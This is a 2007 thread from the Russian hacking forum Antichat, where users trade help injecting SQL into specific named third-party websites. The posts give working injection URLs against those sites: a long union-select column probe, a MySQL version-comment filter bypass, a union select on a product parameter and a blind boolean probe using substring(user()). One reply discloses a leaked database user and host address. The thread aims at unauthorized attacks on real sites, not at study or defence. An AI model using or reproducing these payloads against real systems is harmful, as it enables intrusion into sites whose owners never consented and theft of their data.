Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
23.10.2007, 14:50
|
|
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме:
1269624
Репутация:
114
|
|
Народ благо не создавать новых тем помогите со скулем
http://www.lesprom.ru/html/error.php3?e404'/*
Немогу подобрать колонки может стото не так делаю( может просто mysql версии < 4.0
вот такой запрос непрокатывает( надоело поля подбирать да и неверю что их так много)
http://www.lesprom.ru/html/error.php3?-1'%20union%20select%20null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null/*
А вот тут
http://www.lesprom.ru/members/azlist.php3?sort=clist&order=fullname/*
с ордером проблема помогите хотябы поля подобрать.
Последний раз редактировалось EST a1ien; 23.10.2007 в 14:53..
|
|
|
23.10.2007, 20:03
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от EST a1ien
http://www.lesprom.ru/html/error.php3?e404'/*
Немогу подобрать колонки может стото не так делаю( может просто mysql версии < 4.0
мускул действительно 3x в нем union select не катит
да и пробелы фильтруются
Код:
http://www.lesprom.ru/html/error.php3?e404'/*!30000asas/*
Сообщение от EST a1ien
А вот тут
http://www.lesprom.ru/members/azlist.php3?sort=clist&order=fullname/*
с ордером проблема помогите хотябы поля подобрать.
тут у меня не получилось провести инъекцию, хотя ошибка выдается, мож там фильтрация какая нить...
а насчет:
с ордером проблема помогите хотябы поля подобрать.
я вобще не понял о чем ты
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 23.10.2007 в 20:09..
|
|
|
|
23.10.2007, 20:15
|
|
Участник форума
Регистрация: 04.05.2007
Сообщений: 267
Провел на форуме:
409147
Репутация:
33
|
|
http://www.cddj.ru/index.php?productID=-6915+union+select+1,2,3,4/*
вот сайт, я давал кешу и блекберу, они развели руками или чем там )
кстати, кеш автор множества статей по скулю =\
|
|
|
|
23.10.2007, 22:02
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
вобщем там mysql 4.1 user()-clubfotonet@81.177.16.192
Это все делается через подзапросы, но в другом параметре:
Код:
http://www.cddj.ru/index.php?productID=1312&picture_id=1420%20and%20substring(user(),25,1)=2/*
вобщем если выражение верное, то загружаются сразу много картинок, в противном случае картинки незагружаются...
версия 4.1 используй подзапросы
__________________
Карфаген должен быть разрушен...
|
|
|
|
23.10.2007, 22:34
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
Сообщение от rubik-nerubik
http://www.cddj.ru/index.php?productID=-6915+union+select+1,2,3,4/*
вот сайт, я давал кешу и блекберу, они развели руками или чем там )
кстати, кеш автор множества статей по скулю =\
в этом параметре да =)
на полный аудит сайта я не не подписывался =)
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
24.10.2007, 11:55
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
http://www.cddj.ru/index.php?productID=-6915+union+select+1,2,3,4/*
вот сайт, я давал кешу и блекберу, они развели руками или чем там )
кстати, кеш автор множества статей по скулю =\
Когда вас корректно посылают вы не понимаете?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
